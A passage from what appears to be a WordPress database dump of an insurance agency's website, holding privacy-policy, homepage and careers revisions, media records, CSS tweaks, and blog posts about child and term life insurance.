wp:paragraph -->\r\n<p>If you leave a comment, the comment and its metadata are retained indefinitely. This is so we can recognize and approve any follow-up comments automatically instead of holding them in a moderation queue.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>For users that register on our website (if any), we also store the personal information they provide in their user profile. All users can see, edit, or delete their personal information at any time (except they cannot change their username). Website administrators can also see and edit that information.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>What rights you have over your data</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you have an account on this site or have left comments, you can request to receive an exported file of the personal data we hold about you, including any data you have provided to us. You can also request that we erase any personal data we hold about you. This does not include any data we are obliged to keep for administrative, legal, or security purposes.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Where your data is sent</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Visitor comments may be checked through an automated spam detection service.</p>\r\n<!-- /wp:paragraph -->','Privacy Policy','','inherit','closed','closed','','3-revision-v1','','','2023-04-01 14:10:07','2023-04-01 14:10:07','',3,'http://cmdev-site1.com/?p=560',0,'revision','',0),(169,1,'2023-03-06 14:27:28','2023-03-06 14:27:28','<!-- wp:heading -->\r\n<h2>Who we are</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>Our website address is: <a href=\"https://www.jsuttonfinancial.com/\" target=\"_blank\" rel=\"noopener\">https://www.jsuttonfinancial.com/</a>.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Comments</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>When visitors leave comments on the site, we collect the data shown in the comments form and the visitor’s IP address and browser user agent string to help spam detection.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>An anonymized string created from your email address (also called a hash) may be provided to the Gravatar service to see if you are using it. The Gravatar service privacy policy is available here: https://automattic.com/privacy/. After approval of your comment, your profile picture is visible to the public in the context of your comment.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Media</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you upload images to the website, you should avoid uploading images with embedded location data (EXIF GPS) included. Visitors to the website can download and extract any location data from images on the website.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Cookies</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you leave a comment on our site, you may opt-in to saving your name, email address and website in cookies. These are for your convenience so that you do not have to fill in your details again when you leave another comment. These cookies will last for one year.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you visit our login page, we will set a temporary cookie to determine if your browser accepts cookies. This cookie contains no personal data and is discarded when you close your browser.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>When you log in, we will also set up several cookies to save your login information and your screen display choices. Login cookies last for two days, and screen options cookies last for a year. If you select \"Remember Me,\" your login will persist for two weeks. If you log out of your account, the login cookies will be removed.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If you edit or publish an article, an additional cookie will be saved in your browser. This cookie includes no personal data and simply indicates the post ID of the article you just edited. It expires after 1 day.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Embedded content from other websites</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>Articles on this site may include embedded content (e.g., videos, images, articles, etc.). Embedded content from other websites behaves in the exact same way as if the visitor has visited the other website.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>These websites may collect data about you, use cookies, embed additional third-party tracking, and monitor your interaction with that embedded content, including tracking your interaction with the embedded content if you have an account and are logged in to that website.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Who we share your data with</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you request a password reset, your IP address will be included in the reset email.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>How long we retain your data</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you leave a comment, the comment and its metadata are retained indefinitely. This is so we can recognize and approve any follow-up comments automatically instead of holding them in a moderation queue.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>For users that register on our website (if any), we also store the personal information they provide in their user profile. All users can see, edit, or delete their personal information at any time (except they cannot change their username). Website administrators can also see and edit that information.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>What rights you have over your data</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>If you have an account on this site, or have left comments, you can request to receive an exported file of the personal data we hold about you, including any data you have provided to us. You can also request that we erase any personal data we hold about you. This does not include any data we are obliged to keep for administrative, legal, or security purposes.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading -->\r\n<h2>Where your data is sent</h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p><strong class=\"privacy-policy-tutorial\">Suggested text: </strong>Visitor comments may be checked through an automated spam detection service.</p>\r\n<!-- /wp:paragraph -->','Privacy Policy','','inherit','closed','closed','','3-revision-v1','','','2023-03-06 14:27:28','2023-03-06 14:27:28','',3,'http://cmdev-site1.com/?p=169',0,'revision','',0),(198,1,'2023-03-07 17:47:36','2023-03-07 17:47:36','','Justin-Sutton-rev-1_black_on_transparent_high-res (1)','','inherit','open','closed','','justin-sutton-rev-1_black_on_transparent_high-res-1','','','2023-03-07 17:47:36','2023-03-07 17:47:36','',0,'http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png',0,'attachment','image/png',0),(792,3,'2023-04-08 12:41:34','2023-04-08 12:41:34','','Thumbs Up Icon No Background Hex 666666','','inherit','open','closed','','thumbs-up-icon-no-background-hex-666666','','','2023-04-08 12:41:34','2023-04-08 12:41:34','',0,'http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png',0,'attachment','image/png',0),(791,3,'2023-04-08 12:14:53','2023-04-08 12:14:53','','Header Full Color 2200x1028','','inherit','open','closed','','header-full-color-2200x1028','','','2023-04-08 12:14:53','2023-04-08 12:14:53','',0,'http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png',0,'attachment','image/png',0),(361,1,'2023-03-17 23:27:35','2023-03-17 23:27:35','<p><img class=\"size-large wp-image-163\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/New-Website-Header-No-Verbage-1024x666.jpg\" alt=\"\" width=\"1024\" height=\"666\" /></p><p> </p><p>We have your back.<br />American Income Life has ours.</p><p>JU. Sutton Financial offers</p><p> </p>','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-17 23:27:35','2023-03-17 23:27:35','',138,'http://cmdev-site1.com/?p=361',0,'revision','',0),(203,1,'2023-03-08 13:01:14','2023-03-08 13:01:14','[et_pb_section fb_built=\"1\" _builder_version=\"4.16\" global_colors_info=\"{}\" collapsed=\"off\"][et_pb_row _builder_version=\"4.16\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.16\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" global_colors_info=\"{}\"]\r\n\r\n[caption id=\"attachment_163\" align=\"aligncenter\" width=\"1024\"]<img class=\"size-large wp-image-163\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/New-Website-Header-No-Verbage-1024x666.jpg\" alt=\"\" width=\"1024\" height=\"666\" /> Little child playing superhero. Kid on the background of bright blue wall. Girl power concept. Yellow, pink and turquoise colors.[/caption]\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home - 2','','inherit','closed','closed','','138-revision-v1','','','2023-03-08 13:01:14','2023-03-08 13:01:14','',138,'http://cmdev-site1.com/?p=203',0,'revision','',0),(213,3,'2023-03-09 15:35:36','2023-03-09 15:35:36','[caption id=\"attachment_163\" align=\"aligncenter\" width=\"1024\"]<img class=\"size-large wp-image-163\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/New-Website-Header-No-Verbage-1024x666.jpg\" alt=\"\" width=\"1024\" height=\"666\" /> Little child playing superhero. Kid on the background of bright blue wall. Girl power concept. Yellow, pink and turquoise colors.[/caption]','Home - 2','','inherit','closed','closed','','138-revision-v1','','','2023-03-09 15:35:36','2023-03-09 15:35:36','',138,'http://cmdev-site1.com/?p=213',0,'revision','',0),(229,1,'2023-03-12 05:27:48','2023-03-12 05:27:48','[et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.0\" _module_preset=\"default\"][et_pb_row _builder_version=\"4.20.0\" _module_preset=\"default\" column_structure=\"1_5,3_5,1_5\" theme_builder_area=\"post_content\"][et_pb_column _builder_version=\"4.20.0\" _module_preset=\"default\" type=\"1_5\" theme_builder_area=\"post_content\"][/et_pb_column][et_pb_column _builder_version=\"4.20.0\" _module_preset=\"default\" type=\"3_5\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.0\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_text][/et_pb_column][et_pb_column _builder_version=\"4.20.0\" _module_preset=\"default\" type=\"1_5\" theme_builder_area=\"post_content\"][/et_pb_column][/et_pb_row][/et_pb_section]','Insurance Quote','','inherit','closed','closed','','225-revision-v1','','','2023-03-12 05:27:48','2023-03-12 05:27:48','',225,'http://cmdev-site1.com/?p=229',0,'revision','',0),(230,1,'2023-03-12 05:30:10','2023-03-12 05:30:10','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.0\" _module_preset=\"default\"][et_pb_column _builder_version=\"4.20.0\" _module_preset=\"default\" type=\"4_4\"][et_pb_text _builder_version=\"4.20.0\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Insurance Quote','','inherit','closed','closed','','225-revision-v1','','','2023-03-12 05:30:10','2023-03-12 05:30:10','',225,'http://cmdev-site1.com/?p=230',0,'revision','',0),(468,3,'2023-03-23 12:23:13','2023-03-23 12:23:13','','City of Houston Skyline July 4th 2018 with dramatic sunset','','inherit','open','closed','','city-of-houston-skyline-july-4th-2018-with-dramatic-sunset-2','','','2023-03-23 12:23:13','2023-03-23 12:23:13','',0,'http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE.jpg',0,'attachment','image/jpeg',0),(360,1,'2023-03-17 23:27:32','2023-03-17 23:27:32','<p><img class=\"size-large wp-image-163\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/New-Website-Header-No-Verbage-1024x666.jpg\" alt=\"\" width=\"1024\" height=\"666\" /></p><p> </p><p>We have your back.<br />American Income Life has ours.</p><p>JU. Sutton Financial offers</p><p> </p>','Home - 2','','inherit','closed','closed','','138-revision-v1','','','2023-03-17 23:27:32','2023-03-17 23:27:32','',138,'http://cmdev-site1.com/?p=360',0,'revision','',0),(214,3,'2023-03-09 15:42:34','2023-03-09 15:42:34','[et_pb_section][et_pb_row][et_pb_column type=\"4_4\"][et_pb_text]\r\n\r\n<img class=\"size-large wp-image-163\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/New-Website-Header-No-Verbage-1024x666.jpg\" alt=\"\" width=\"1024\" height=\"666\" />\r\n\r\n&nbsp;\r\n\r\nWe have your back.\r\nAmerican Income Life has ours.\r\n\r\nJU. Sutton Financial offers\r\n\r\n&nbsp;\r\n\r\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home - 2','','inherit','closed','closed','','138-revision-v1','','','2023-03-09 15:42:34','2023-03-09 15:42:34','',138,'http://cmdev-site1.com/?p=214',0,'revision','',0),(216,3,'2023-03-09 16:45:34','2023-03-09 16:45:34','','justinsuttonheadshotsmall Black-White','','inherit','open','closed','','justinsuttonheadshotsmall-black-white-2','','','2023-03-09 16:45:34','2023-03-09 16:45:34','',0,'http://cmdev-site1.com/wp-content/uploads/2023/03/justinsuttonheadshotsmall-Black-White.png',0,'attachment','image/png',0),(217,3,'2023-03-09 16:45:40','2023-03-09 16:45:40','','Seth','','inherit','open','closed','','seth','','','2023-03-09 16:45:40','2023-03-09 16:45:40','',0,'http://cmdev-site1.com/wp-content/uploads/2023/03/Seth.jpg',0,'attachment','image/jpeg',0),(218,3,'2023-03-09 16:45:45','2023-03-09 16:45:45','','Matthew Sutton','','inherit','open','closed','','matthew-sutton','','','2023-03-09 16:45:45','2023-03-09 16:45:45','',0,'http://cmdev-site1.com/wp-content/uploads/2023/03/Matthew-Sutton.jpg',0,'attachment','image/jpeg',0),(219,3,'2023-03-09 16:45:48','2023-03-09 16:45:48','','Andres Cano','','inherit','open','closed','','andres-cano','','','2023-03-09 16:45:48','2023-03-09 16:45:48','',0,'http://cmdev-site1.com/wp-content/uploads/2023/03/Andres-Cano.jpg',0,'attachment','image/jpeg',0),(478,3,'2023-03-23 16:35:01','2023-03-23 16:35:01','{\n    \"site_icon\": {\n        \"value\": 477,\n        \"type\": \"option\",\n        \"user_id\": 3,\n        \"date_modified_gmt\": \"2023-03-23 16:35:01\"\n    }\n}','','','trash','closed','closed','','3b286bf5-4919-4648-9d99-68074f46f376','','','2023-03-23 16:35:01','2023-03-23 16:35:01','',0,'http://cmdev-site1.com/2023/03/23/3b286bf5-4919-4648-9d99-68074f46f376/',0,'customize_changeset','',0),(221,3,'2023-03-09 16:50:08','2023-03-09 16:50:08','','are you covered, travel insurance concept','are you covered, travel insurance concept','inherit','open','closed','','are-you-covered-travel-insurance-concept','','','2023-03-09 16:50:08','2023-03-09 16:50:08','',0,'http://cmdev-site1.com/wp-content/uploads/2023/03/AdobeStock_132618162.jpeg',0,'attachment','image/jpeg',0),(223,3,'2023-03-09 16:50:52','2023-03-09 16:50:52','Family Housing Concept. Parents Making Symbolic Roof Joining Hands Above Their Kids Sitting On Floor At Home.','Parents Making Symbolic Roof Joining Hands Above Kids Sitting Indoors','\n','inherit','open','closed','','parents-making-symbolic-roof-joining-hands-above-kids-sitting-indoors','','','2023-03-14 13:26:27','2023-03-14 13:26:27','',0,'http://cmdev-site1.com/wp-content/uploads/2023/03/AdobeStock_373681300.jpeg',0,'attachment','image/jpeg',0),(312,3,'2023-03-14 13:27:29','2023-03-14 13:27:29','<span style=\"font-size: 8pt;\">By Mike Elman</span>\r\n\r\nA lot of parents wonder if purchasing life insurance for their children is the right financial decision. However, with valid concerns for both sides of the argument, it can be hard to determine if purchasing life insurance for your child is the right decision.\r\n\r\nThis blog will cover everything you need to know about life insurance on children while presenting you the pros and cons of such an investment with insight from an array of experts.\r\n<h3>How Life Insurance on Children Works</h3>\r\nLife insurance on children is often marketed to parents and grandparents as a way to save for the child’s financial future while protecting the child’s insurability. While there are an array of child life insurance options available, most child life insurance policies are offered in the form of whole life, a type of permanent life insurance that includes a cash value component.<sup>1</sup>\r\n\r\nWhole life insurance policies that include a cash value component can be used to pay for a variety of things, including but not limited to college education, a car or housing down payment, medical bills, and more.\r\n\r\nSome argue that one of the most compelling features of child life insurance comes in the form of its cash value component, which is tax-deferred—meaning that it isn’t taxed as income until you withdraw money from the policy or surrender the policy entirely.<sup>1</sup>\r\n\r\nThat, and the slow but steady growth of cash value over time, can make child life insurance an alluring option for parents and grandparents looking to ensure the child protected is in the best possible financial position for the future.\r\n-\r\n<h3>The Pros and Cons</h3>\r\nAs mentioned, there are great points to consider for buying or not buying a life insurance policy for your child. But with so many conflicting opinions on the matter, it can be difficult to navigate.\r\n\r\nBelow, you’ll find a list of commonly associated pros and cons of child life insurance to help you make the best decision for your family.\r\n<ul>\r\n 	<li><strong>Pro:</strong> There are a number of factors that can impact your child’s future insurability, including high blood pressure, diabetes, and obesity, to name a few.<sup>2</sup> With this in mind, a child who develops any health issue early on in life may have trouble qualifying for life insurance coverage in the future, as they could be considered a higher risk.<sup>2</sup> By purchasing child life insurance coverage early, you can help ensure your child has coverage now and well into their adult life—regardless of any medical issues that may develop along the way.</li>\r\n 	<li><strong>Con:</strong> The chances of a child developing a health issue so early on in life are rare. So, investing in a child life insurance policy can be an expensive investment for such a minute risk.</li>\r\n 	<li><strong>Pro:</strong> Small policies can be affordable, with costs ranging from $5 to $15 a month.<sup>2</sup> While the death of a child is rare, being covered in the case of tragedy can help provide you with financial security in the worst possible situation imaginable.</li>\r\n 	<li><strong>Con:</strong> Statistically, the odds of a child dying are very slim. Some experts suggest stashing money into an emergency fund instead of investing in a child life policy, which would allow for the funds to be used in case of any crisis—not just the death of a child.<sup>1</sup></li>\r\n 	<li><strong>Pro:</strong> You can use the cash value your policy accrues to help your child pay for an array of costs, including college expenses, a car payment, or something else down the line.<sup>2</sup></li>\r\n 	<li><strong>Con:</strong> Some argue that there are better ways to save for your child’s financial future than with a child\'s life insurance policy. In fact, Carrie Houchins-Witt, a financial advisor in Iowa, states, “There are a multitude of opportunities to make a better return than through investing in life insurance.”<sup>1\r\n-</sup></li>\r\n</ul>\r\n<h3>To Summarize</h3>\r\nAs you can see, there are a number of arguments for and against child life insurance. However, expert opinions and blog postings aside, you know what path provides the best opportunity for you and your family.\r\n\r\nMake sure to take your unique situation into account and consult with your local insurance agent or financial advisor before proceeding with a child life insurance policy purchase.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Nerdwallet, Life Insurance for Children: The Cases for and Against, 2018, <a href=\"https://www.nerdwallet.com/blog/insurance/debate-over-life-insurance-for-children/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.nerdwallet.com/blog/insurance/debate-over-life-insurance-for-children/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. The Balance, Top 5 Reasons to Buy Life Insurance for Your Children, 2019, <a href=\"https://www.thebalance.com/consider-buying-life-insurance-for-children-3129226\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.thebalance.com/consider-buying-life-insurance-for-children-3129226</a></span></em>','Life Insurance On Children: What You Need To Know','','inherit','closed','closed','','311-revision-v1','','','2023-03-14 13:27:29','2023-03-14 13:27:29','',311,'http://cmdev-site1.com/?p=312',0,'revision','',0),(233,1,'2023-03-12 05:43:14','2023-03-12 05:43:14','.gform_wrapper.tc_wrapper {\r\n    width: 800px;\r\n    margin: 0 auto;\r\n    padding: 30px;\r\n    border: 1px solid rgba(0,0,0,.1);\r\n    border-radius: 8px;\r\n}','Divi','','inherit','closed','closed','','35-revision-v1','','','2023-03-12 05:43:14','2023-03-12 05:43:14','',35,'http://cmdev-site1.com/?p=233',0,'revision','',0),(232,1,'2023-03-12 05:40:23','2023-03-12 05:40:23','.gform_wrapper.tc_wrapper {\r\n    width: 800px;\r\n    margin: 0 auto;\r\n    background: rgba(0,0,0, .01);\r\n    padding: 30px;\r\n    border: 1px solid rgba(0,0,0,.1);\r\n    border-radius: 8px;\r\n}','Divi','','inherit','closed','closed','','35-revision-v1','','','2023-03-12 05:40:23','2023-03-12 05:40:23','',35,'http://cmdev-site1.com/?p=232',0,'revision','',0),(234,1,'2023-03-12 05:43:38','2023-03-12 05:43:38','.gform_wrapper.tc_wrapper {\r\n    width: 800px;\r\n    margin: 0 auto;\r\n    background: #fff;\r\n    padding: 30px;\r\n    border: 1px solid rgba(0,0,0,.1);\r\n    border-radius: 8px;\r\n}','Divi','','inherit','closed','closed','','35-revision-v1','','','2023-03-12 05:43:38','2023-03-12 05:43:38','',35,'http://cmdev-site1.com/?p=234',0,'revision','',0),(237,3,'2023-03-13 12:37:36','2023-03-13 12:37:36','<p><!-- wp:heading {\"textAlign\":\"center\"} --></p>\r\n<p><span style=\"background-color: #ffff99;\">The layout and verbiage are a go. I just need to pull photos for you. </span></p>\r\n<p>&nbsp;</p>\r\n<h1 class=\"has-text-align-center\" style=\"text-align: center;\">Grow Your Future With Us</h1>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph {\"align\":\"center\"} -->\r\n<h2 style=\"text-align: center;\">Interested in starting your career path and joining our team? <a>Let\'s Talk! </a></h2>\r\n<p>Some insurance companies only care about making money from their insurance policies. But at J. Sutton, we care about people. And Agents who choose to sell our life insurance have an opportunity to make an impact on their clients, their community, their family, and their career. There’s way more to it than meets the eye.</p>\r\n<p>J. Sutton Financial attracts a select group of leaders, entrepreneurs, and high achievers eager to jumpstart their sales careers with a fast-paced and stable company.</p>\r\n<h2 style=\"text-align: center;\">Opportunity <strong>Unlimited</strong></h2>\r\n<p>At J. Sutton Financial, \'Opportunity Unlimited\' means you decide what you are worth. As an independent contractor, you are in control. Your performance determines how much money you make and how far you take your career. Selling our products gives you the opportunity to earn as much as you desire.</p>\r\n<p class=\"has-text-align-center\" style=\"text-align: center;\">Learn about our available openings and how you can join our team today!</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>&nbsp;</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:image {\"id\":43,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\r\n<figure class=\"wp-block-image size-large\"><img class=\"wp-image-43\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/02/Careers-Photo-No-Background-1024x443.png\" alt=\"\" /></figure>\r\n<!-- /wp:image -->\r\n\r\n<!-- wp:paragraph --><!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading {\"textAlign\":\"center\"} -->\r\n<h2 class=\"has-text-align-center\" style=\"text-align: center;\"> </h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph {\"align\":\"center\"} --><!-- /wp:paragraph -->','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-03-13 12:37:36','2023-03-13 12:37:36','',38,'http://cmdev-site1.com/?p=237',0,'revision','',0),(475,3,'2023-03-23 12:27:29','2023-03-23 12:27:29','','Umbrella Roll in Icon','','inherit','open','closed','','umbrella-roll-in-icon','','','2023-03-26 19:21:10','2023-03-26 19:21:10','',0,'http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png',0,'attachment','image/png',0),(469,3,'2023-03-23 12:23:38','2023-03-23 12:23:38','','Justin Confrence Room 2 Black & White Muted','','inherit','open','closed','','justin-confrence-room-2-black-white-muted','','','2023-03-23 12:23:38','2023-03-23 12:23:38','',0,'http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Confrence-Room-2-Black-White-Muted.jpg',0,'attachment','image/jpeg',0),(470,3,'2023-03-23 12:24:08','2023-03-23 12:24:08','','Happy family mother father and daughter walk on nature on sunset','Happy family mother father and daughter walk on nature on sunset hold hand','inherit','open','closed','','happy-family-mother-father-and-daughter-walk-on-nature-on-sunset','','','2023-03-23 12:24:08','2023-03-23 12:24:08','',0,'http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted.jpg',0,'attachment','image/jpeg',0),(240,3,'2023-03-13 12:39:23','2023-03-13 12:39:23','','Group of young people working or studying together. Hipster team','Group of young people working or studying together. Hipster team in coworking. Young modern business colleagues. Teamwork. Startup concept','inherit','open','closed','','group-of-young-people-working-or-studying-together-hipster-team','','','2023-03-13 12:39:23','2023-03-13 12:39:23','',0,'http://cmdev-site1.com/wp-content/uploads/2023/03/CALL-CENTER-Group-of-young-people-working-or-studying-together.-Hipster-team-in-coworking.-6960-x-4912.jpg',0,'attachment','image/jpeg',0),(241,3,'2023-03-13 12:43:13','2023-03-13 12:43:13','<p><!-- wp:heading {\"textAlign\":\"center\"} --></p>\r\n<p><span style=\"background-color: #ffff99;\">BOTTOM OF PAGE: The layout and verbiage are a go. I pulled the photos. They each have a title that matches the job description below.</span></p>\r\n<p>&nbsp;</p>\r\n<h1 class=\"has-text-align-center\" style=\"text-align: center;\">Grow Your Future With Us</h1>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph {\"align\":\"center\"} -->\r\n<h2 style=\"text-align: center;\">Interested in starting your career path and joining our team? <a>Let\'s Talk! </a></h2>\r\n<p>Some insurance companies only care about making money from their insurance policies. But at J. Sutton, we care about people. And Agents who choose to sell our life insurance have an opportunity to make an impact on their clients, their community, their family, and their career. There’s way more to it than meets the eye.</p>\r\n<p>J. Sutton Financial attracts a select group of leaders, entrepreneurs, and high achievers eager to jumpstart their sales careers with a fast-paced and stable company.</p>\r\n<h2 style=\"text-align: center;\">Opportunity <strong>Unlimited</strong></h2>\r\n<p>At J. Sutton Financial, \'Opportunity Unlimited\' means you decide what you are worth. As an independent contractor, you are in control. Your performance determines how much money you make and how far you take your career. Selling our products gives you the opportunity to earn as much as you desire.</p>\r\n<p class=\"has-text-align-center\" style=\"text-align: center;\">Learn about our available openings and how you can join our team today!</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>&nbsp;</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:image {\"id\":43,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\r\n<figure class=\"wp-block-image size-large\"><img class=\"wp-image-43\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/02/Careers-Photo-No-Background-1024x443.png\" alt=\"\" /></figure>\r\n<!-- /wp:image -->\r\n\r\n<!-- wp:paragraph --><!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading {\"textAlign\":\"center\"} -->\r\n<h2 class=\"has-text-align-center\" style=\"text-align: center;\"> </h2>\r\n<!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph {\"align\":\"center\"} --><!-- /wp:paragraph -->','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-03-13 12:43:13','2023-03-13 12:43:13','',38,'http://cmdev-site1.com/?p=241',0,'revision','',0),(242,3,'2023-03-13 13:02:40','2023-03-13 13:02:40','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nThere are many considerations to make when getting term life insurance, like which company to choose, how long of a term you should get, or who to name as the beneficiary. You also have to consider the policy’s face value.\r\n<h3>What is the Face Value?</h3>\r\nThe face value of a term life insurance policy is the benefit amount or the amount the beneficiary of the policy would get upon the death of the insured. The face value is determined when you purchase the policy.\r\n\r\nYou may be wondering, can I increase the face value of my term life insurance policy?\r\n<h3>It Depends on the Policy</h3>\r\nThere are many policies that have a built-in benefit with a guaranteed purchase option that makes it possible to increase the face value of the policy. You can also often purchase riders to provide additional coverage. The additional riders would have the same expiration as the base term policy.\r\n<h3>Increasing Term Life Insurance</h3>\r\nThere is a term life insurance product known as increasing term life insurance, and it works like it sounds: with a face value that increases over the course of the term. Sometimes people who anticipate needing more life insurance (if they expect to have a family, a mortgage, or a higher income and expenses) choose increasing term insurance.\r\n\r\nAs the face value increases, the premium typically increases as well.\r\n<h3>Do Your Research</h3>\r\nIf you want to increase the face value of your term life insurance policy, check the terms and conditions of the policy to see if that’s an option. You can also contact the insurance company or your licensed insurance agent to see if you can add riders to your policy.\r\n\r\nAlways be sure to understand the benefits and limitations of any life insurance policy before you purchase it, especially if you think you might be interested in getting a policy in which you can increase the face value.\r\n\r\nIf you have any questions about increasing the face value of a term life insurance policy, contact a licensed insurance agent.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.','Can I Increase The Face Value Of My Term Life Insurance?','','publish','open','open','','can-i-increase-the-face-value-of-my-term-life-insurance','','','2023-03-19 17:43:20','2023-03-19 17:43:20','',0,'http://cmdev-site1.com/?p=242',0,'post','',0),(243,3,'2023-03-13 13:02:00','2023-03-13 13:02:00','Businessman with money on his mind on chalkboard background','Businessman with money on mind','','inherit','open','closed','','businessman-with-money-on-mind','','','2023-03-13 13:02:27','2023-03-13 13:02:27','',242,'http://cmdev-site1.com/wp-content/uploads/2023/03/Businessman-with-money-on-mind-1000x657-1.jpg',0,'attachment','image/jpeg',0),(244,3,'2023-03-13 13:02:40','2023-03-13 13:02:40','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nThere are many considerations to make when getting term life insurance, like which company to choose, how long of a term you should get, or who to name as the beneficiary. You also have to consider the policy’s face value.\r\n<h3>What is the Face Value?</h3>\r\nThe face value of a term life insurance policy is the benefit amount or the amount the beneficiary of the policy would get upon the death of the insured. The face value is determined when you purchase the 